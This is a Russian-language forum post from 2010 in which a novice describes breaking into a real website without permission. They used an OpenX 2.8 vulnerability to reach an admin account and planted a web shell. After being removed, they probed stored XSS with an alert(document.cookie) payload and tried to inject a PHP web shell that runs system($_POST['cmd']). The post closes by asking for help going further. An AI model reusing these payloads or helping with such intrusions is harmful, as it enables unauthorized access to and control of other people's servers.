HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница

Опции темы Поиск в этой теме Опции просмотра

Старый 31.07.2010, 18:29
kiberon
Новичок
Провел на форуме:
10300

Ребят несколько дней назад через ОпенХ 2.8 уязвимость вошел в админ аккаунт, потом залил шелл. Просидел мой шелл там около 4 дней. )))) Но на 5 день у меня и шелл пропал, и ОпенХ тоже нету и пароль к админ панелью Апача тоже вообщем меня конкретно устранили. Но я не успокоилья, нашел ХСС на сайте. Дело такое, есть поле для ввода всяких мыслей и вырожений, типа "чего я буду делать завтра": - ОТВЕТ: Вас поламаю...))))))) ну и так дали. В поле ввода набрал

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]alert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]document[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]cookie[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"][/COLOR][/COLOR
и обламался, потом решил нажать на "Редактировать" ну давай по редоктируем, и опять же набрал тоже самое..и удача, вижу свои кукиси. Сделал рефреш, облом, в место выполнения скрипта показывает текст, опять редактировал, нажал сохранить, и опять скрипт задействовал. Дальше набрал

PHP код:
PHP:
[
COLOR="#000000"]

[COLOR="#0000BB"]"[/COLOR][COLOR="#007700"];

@[/COLOR][COLOR="#0000BB"]system[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'cmd'[/COLOR][COLOR="#007700"]]);

echo[/
COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]?>

[/COLOR]

[/COLOR] 
Ну после редактирования у меня есть поле для загрузки файла, но.. тут то и дело что ничего и не получилось, опять же как после перезагрузки страници вижу только код (((( ну что поделать дальше?

Ну сильно не пинайте, я еще не вольшебник, я только учусь )))))))))))))))))))))))))))))))))))))